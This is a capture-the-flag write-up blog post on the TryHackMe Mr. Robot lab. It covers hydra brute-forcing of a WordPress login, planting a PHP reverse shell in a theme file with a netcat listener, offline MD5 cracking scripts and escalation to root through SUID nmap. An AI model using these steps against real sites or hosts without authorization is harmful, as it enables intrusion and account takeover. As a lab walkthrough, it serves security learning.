DEV Community

christine

Let's Hack The World in The MR. Robot CTF! 👾

Today we are going to take a crack at the Mr. Robot CTF on TryHackMe. I must say before we start that I love the design of this lab! The website is so cool and so well thought out, it was just perfect. I really encourage you to look at all the videos, it's pretty hackery. 😀

When you're ready, put on your FSOCIETY hoodie and let's hack the world!


What is key 1?

Once your machine is loaded, we can start with basic enumeration. First things first: opening the machine's IP address in a browser shows a command-line-style website. Each command you type loads a video, so it's not important for the challenge (but you can check it out if you want).


Let's run an nmap scan to see if we can find any services.
nmap -sV -Pn <your machine IP>

Hmm, the ssh port (22) is closed. There is an ssl/http port that is of interest, though. Let's run a gobuster scan to see which directories we can enumerate.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u <your machine IP> -t 50

We can see that there is a /robots entry, and the room's hint also says "Robots". Let's navigate to /robots (the site's robots.txt).

Our robots.txt mentions two files: key-1-of-3.txt, and fsocity.dic, which is a wordlist we will need later, so download it now. Let's navigate to the key: <ip>/key-1-of-3.txt.

We've found our first key!


What is key 2?

Looking back at our gobuster scan, we can see /login and /wp-login, which tells us the site runs WordPress. Let's navigate to /wp-login.

We won't get very far without a username and password (duh!). Running wpscan against the site to enumerate users gives us nothing useful, apart from the WordPress version, which we could look up for known exploits.
wpscan --url http://<your machine IP>/ --enumerate u

We have two options now: manually trying different usernames, or using Burp Suite's Intruder to find one. WordPress makes this easier than it should be: its login error message tells you whether the username exists or only the password is wrong, so each guess is confirmed or ruled out on the spot. When I first did this CTF, I tried my luck by going with the most obvious usernames: MrRobot and Elliot. Elliot won!

Now that we have a username, we can go back to wpscan (or in my case I chose hydra) and run through the fsocity.dic file we downloaded above to find a valid password for Elliot.

  • export ip=<your machine IP>
  • hydra -l Elliot -P ./Downloads/fsocity.dic -V $ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location'
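One thing worth doing before launching hydra: fsocity.dic as served by the box contains a very large number of repeated lines, and every repeat is a login attempt hydra has to wait for. The script below is an added example, not code from the original post; it keeps the first occurrence of each word (so the original ordering is preserved), drops blank lines and Windows line endings, and prints the line count before and after. The demo input at the bottom is constructed and stands in for fsocity.dic.

```shell
# Added example (not from the original post): normalise a wordlist before
# handing it to hydra's -P option. Prints "<lines before> <lines after>".
prep_wordlist() {
    in="$1"
    out="$2"
    before=$(wc -l < "$in" | tr -d ' ')
    # tr strips \r from Windows line endings;
    # awk keeps only non-empty lines it has not seen before (first-seen order)
    tr -d '\r' < "$in" | awk 'NF && !seen[$0]++' > "$out"
    after=$(wc -l < "$out" | tr -d ' ')
    echo "$before $after"
}

# Constructed demo input that stands in for fsocity.dic.
demo=$(mktemp)
printf 'abc\r\nabc\n\nxyz\nabc\nxyz\n' > "$demo"
prep_wordlist "$demo" "${demo}.uniq"   # prints: 6 2
```

Pass the cleaned file to hydra with `-P` instead of the raw download; the success condition and form fields in the command above stay the same.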

This took my scanner 40 minutes, so to save you the effort I will reveal the password for you >> Elliot:ER28-0652. Let's log in using these credentials!

From here on, our next moves are pretty standard. Let's see if we can get a reverse shell with PHP by pasting a shell into the theme's 404.php file in the WordPress theme editor (Appearance > Editor). Remember to save the file. You can download the PHP reverse shell from pentestmonkey; update the IP address in it to your own VPN address (the OpenVPN tun0 interface, not the target machine's IP!) and set the port of your choice (I left it at 1234).

Start up a netcat listener.
nc -nlvp <the port you inserted in the reverse shell>

Now, head over to <your machine IP>/404.php (any URL WordPress can't route is served through the theme's 404 template) and check your netcat listener. We have successfully gained access via our reverse shell!

When we list the files in /home/robot, we find our key-2-of-3.txt file. There is also a password.raw.md5 file, which we'll get to later. Check the permissions with ls -l: if the key turns out to be readable only by robot, it will open once we switch to that user in the next step.

We have our second key!


What is key 3?

Let's read the contents of the password.raw.md5 file. It holds a hashed password for the user robot, in the form username:hash; the name of the file tells us it is a raw (unsalted) MD5 hash.

Let's see if we can crack this hash. Head over to Crackstation and enter it; because it is unsalted MD5, a lookup table will find it if the password is a common one.
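If you would rather not paste a target's hash into a third-party site, the same dictionary attack works offline. The function below is an added example, not code from the original post: it reads a username:hash line like the one in password.raw.md5, checks that the hash really is 32 hex characters (raw MD5), and hashes each candidate word with md5sum until one matches. The hash file and wordlist at the bottom are constructed here so the block runs without the target.

```shell
# Added example (not from the original post): offline dictionary attack on an
# unsalted MD5 hash stored as "user:hexhash". Prints the plaintext and returns
# 0 on success, 1 if the wordlist is exhausted, 2 if the hash is malformed.
crack_md5() {
    hashfile="$1"
    wordlist="$2"
    # take the field after the colon, lower-case it, and sanity-check the format
    target=$(cut -d: -f2 "$hashfile" | head -n1 | tr -d '\r' | tr 'A-F' 'a-f')
    case "$target" in
        *[!0-9a-f]*|"") echo "not a hex hash: '$target'" >&2; return 2 ;;
    esac
    [ ${#target} -eq 32 ] || { echo "not 32 hex chars, raw MD5 expected" >&2; return 2; }
    # printf '%s' avoids hashing a trailing newline, which echo would add
    while IFS= read -r word || [ -n "$word" ]; do
        h=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
        if [ "$h" = "$target" ]; then
            echo "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Constructed demo data: a hash file in the same shape as password.raw.md5
# and a tiny wordlist. The "password" is letmein, chosen here for the demo.
demo_dir=$(mktemp -d)
printf 'robot:%s\n' "$(printf '%s' 'letmein' | md5sum | cut -d' ' -f1)" > "$demo_dir/password.raw.md5"
printf 'password\n123456\nletmein\nqwerty\n' > "$demo_dir/words.txt"
crack_md5 "$demo_dir/password.raw.md5" "$demo_dir/words.txt"   # prints: letmein
```

For a real run, point the second argument at a large list such as rockyou.txt; the loop is slow compared with hashcat or john, but it shows exactly what the lookup site is doing for you.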

Let's check which user we are with whoami. We are running as daemon, but since we now have robot's password (the one we just cracked) we can switch to that account with su!

  • whoami
  • su robot

Now that we are logged in as robot, let's look for SUID binaries: files that run with their owner's privileges instead of ours, which is the classic Linux privilege-escalation path when the owner is root.
find / -perm -u=s -type f 2>/dev/null
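The find command above usually prints a long list, most of which (passwd, sudo, ping and friends) is expected on any Linux box. The helper below is an added example, not code from the original post: it reads that list on stdin and prints only the paths whose basename is one of a short, non-exhaustive set of binaries that GTFOBins documents as abusable when SUID. The set is written from memory and is an assumption; always confirm the exact technique on GTFOBins itself. The input in the demo is constructed.

```shell
# Added example (not from the original post): filter SUID find output down to
# binaries worth checking on GTFOBins. Usage:
#   find / -perm -u=s -type f 2>/dev/null | triage_suid
triage_suid() {
    # assumed subset of the GTFOBins SUID list (from memory, not exhaustive)
    known="nmap vim vi find bash sh python perl less more env cp mv awk"
    while IFS= read -r path; do
        name=${path##*/}
        for k in $known; do
            # exact name, or name followed by a version suffix (python2.7, vim.basic)
            case "$name" in
                "$k"|"$k"[0-9.]*) echo "$path"; break ;;
            esac
        done
    done
}

# Constructed demo input standing in for the real find output.
printf '/usr/local/bin/nmap\n/usr/bin/passwd\n/bin/ping\n/usr/bin/python2.7\n/usr/bin/sudo\n' | triage_suid
```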

The nmap binary looks promising. Head over to GTFOBins and read up on how this binary can be abused when it is SUID: old nmap releases (GTFOBins lists versions 2.02 to 5.21) have an interactive mode from which !sh drops into a shell, and because the binary is SUID root that shell runs as root (confirm with whoami).
nmap --interactive
nmap> !sh

From here we can cd into /root and read the contents of our final flag file, key-3-of-3.txt.

And so we got our flag!


Conclusion

There's a bunch of steps I took in between that didn't pan out into anything. There weren't any vulnerabilities for the WordPress version, in case you were wondering. Ultimately, it was quite an easy CTF! 😁


I hope this was easy enough for you to follow, and until next time, happy hacking!

See more on my GitHub.
